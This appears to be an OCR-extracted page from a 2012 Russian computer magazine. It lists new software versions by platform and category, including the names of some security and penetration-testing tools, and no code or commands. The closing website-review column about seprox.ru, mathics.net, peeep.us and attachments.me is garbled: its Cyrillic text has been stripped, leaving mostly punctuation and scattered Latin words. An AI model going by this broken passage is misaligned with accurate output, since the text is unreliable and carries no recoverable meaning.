AutoHotkey 1.0.48.05
AutoIt 3.3.8.1
Boot Snooze 1.0.5
ClipX 1.0.3.9
File Bucket 1.1.0
FluffyApp 2.0b4
Input Director 1.2.2
ManicTime 2.3
Moo0 FileShredder 1.17
OnTopReplica 3.3.2
QTTabBar 1.5.0.0
Registry Commander 12.01
RidNacs 2.0.3
SnakeTail 1.6
TreeSize Free 2.7
UltraSearch 1.6
>>WINDOWS
>Development
ActivePerl 5.14.2
ActivePython 2.7.2
ActiveTcl 8.5.11
Aptana Studio 3.2.0
Arcadia 0.11.1.2
CodeLobster PHP Edition 4.2.1
DEV-C++ 4.9.9.2
Dojo Toolkit 1.7
HTTP Debugger Pro 4.6
Komodo IDE 7.0.2
LispIDE 20100318
Nemerle 1.1
PluThon 2.0.0
PyDev 2.6.0
ReSharper 6.1.1
SQL Uniform 2.1.1
SQLiteStudio 2.0.27
WaveMaker 6.4.6
>Devel
Blueprintcss 1.0.1
Buildroot 2012.05
Cascading 2.0
Cool-php-captcha 0.3.1
>>UNIX
>Desktop
Avidemux 2.5.6
Datacrow 3.9.14
Digikam 2.6.0
Djvusmooth 0.2.12
Easyimagesizer 3.0.5
Emacs 24.1
Ffmpeg 0.11.1
Flvmeta 1.1.0
Gmsh 2.6.0
Gmtp 1.3.3
J7z 1.2.0
Krut 0.9.3
Mplayer 1.1
Pdf2djvu 0.7.13
Photofilmstrip 1.5.0
Piedock 1.6.1
Qtractor 0.5.5
Vidrop 0.6.8
>System
Cameyo 2.0.831
CCEnhancer 3.4
CCleaner 3.20
CPU-M Benchmark 1.3
CrystalDiskInfo 5.0
DHE Drive Info 3.2.493
Disk Investigator 1.31
DriverIdentifier 4.1
HWiNFO32 4.00
IObit Uninstaller 2.2
Logstalgia 1.0.3
Moo0 SystemMonitor 1.64
RouterPassView 1.40
Soluto 1.3 Beta
UnknownDevices 1.5.2
WinContig 1.10
>Security
Alpha3
API Monitor 2
BoxCryptor 1.3.2
Hook Analyser 2.0
JSDetox 0.1.0
kbsslenforcer
Pafish
pdbparse
PEFrame 0.2
pev 0.5
PowerSploit
pyloris 3.2
Wireshark 1.8.0
Nemesis 1.4
Odysseus 2.0.0.84
Pamela 4.8
Probe Web Server 1.0
RFIDIOt 1.0a
UltraVNC 1.0.9.6.2
VodBurner 1.0.5
Xfire 1.149
>Server
Apache 2.2.22
Asterisk 10.5.1
Bind 9.9.1-p1
Cups 1.5.3
Dhcp 4.2.4
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.31
Mysql 5.5.24
Nsd 3.2.10
>Security
Barada 0.5.3
Clamav 0.97.5
Clonewise
Dnscrypt 0.10.1-2
guile-dlhacks
Intersect-2.5
kbsslenforcer
Laudanum 0.4
Netusse
Netzob 0.3.3
pdbparse
pev 0.5
pyloris 3.2
qcombbdbg
Ratproxy 1.58
Squert 0.9.2
Subterfuge 3.0 beta
Websitecds 1
Wireshark 1.8.0
WPSCrackGUI 1.1.8
>Net
Amsn 0.98.9
Damnvid 1.6
Dante 1.4.0pre1
Eiskaltdcpp 2.2.7
Evolution 3.4.3
Firefox 13.0.1
Frei-chat 7.2
Gmail-plasmoid 0.7.20
Googlecl 0.9.13
Httppp 1.2.0
Liferea 1.8.6
Lince 1.3
Myagent-im 0.4.6
Opera 12.00
Skype 4.0.0.7
Uhub 0.4.0
Voicechatter 1.5.0
Wfs 2.01
Geany 1.22
Gecrit 2.8.3
Haskell-platform 2012.2.0.0
Iep 3.0
Kcov 9
Kyua 0.4
Libzdb 2.10.4
Liteide 12
Liwc 1.21
Nal 20110221
Phpgrid 1.4.1
Pypy 1.9
Rstudio 0.96.304
Ruby 1.9.3p194
>>MAC
Bean 3.2.0
Emacs 24.1
FlashToHTML5 1.8
iMediaHUD 1.2.7
JaBack 9.15
keka 1.0.3
KeyRemap4MacBook 7.8.0
MacRuby 0.12
OSXFUSE 2.4.2
Palringo 4.6.2
Raw Photo Processor 4.6.0
SABnzbd 0.7.0
Sleipnir 3.5.0.1
SoundSource 2.5.1
Sparrow 1.6.2
SQLite 3.7.13
TRIM Enabler 2.2
VUWER 1.5.5
>X-distr
Oracle Linux 6.3
>System
Bindfs 1.10.4
Bumblebee 3.0
Catalyst 12.4
Cfengine 3.3.4
Crush 2012-02
Guacamole 0.6.0
Meld 1.6.0
Nouveau 1.0.1
Oobash 0.39.5
Ppss 2.97
Psmisc 22.19
Qemu 1.1.0-1
Sali 1.5.2
X11 7.7
Xenomai 2.6.0
Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.4
Pure-ftpd 1.0.35
Samba 3.6.6
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.13
Squid 3.1.20
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0
07 (163) 2012
FAQ
WWW2
SEPROX
-
API
seprox.ru
, .
( ), IP , - ,
. ? , seprox. -
. :
(SOCKS/HTTP), , , (GET, POST, cookies, referrer, SSL),
.
-. API,
, , HTTP- . : http://bit.ly/OtVlRG.
mathics.net
,
MATLAB Octave
. Mathics. ,
Mathematica.
, GitHub
Python, , mathics.net .
, ,
, -
. , .
, .
www.peeep.us
, ,
( , ,
), , ,
. Peeep.us,
www.peeep.us/eae7be19. ,
HTML/JS- . , -
- , .
attachments.me
,
.
, , : , , Photos Dropbox-. . ,
. Dropbox
Google Drive Box. Gmail Chrome, .
: , Gmail
.
MATHICS
PEEEP.US
ATTACHMENTS.ME
144
08 /163/ 2012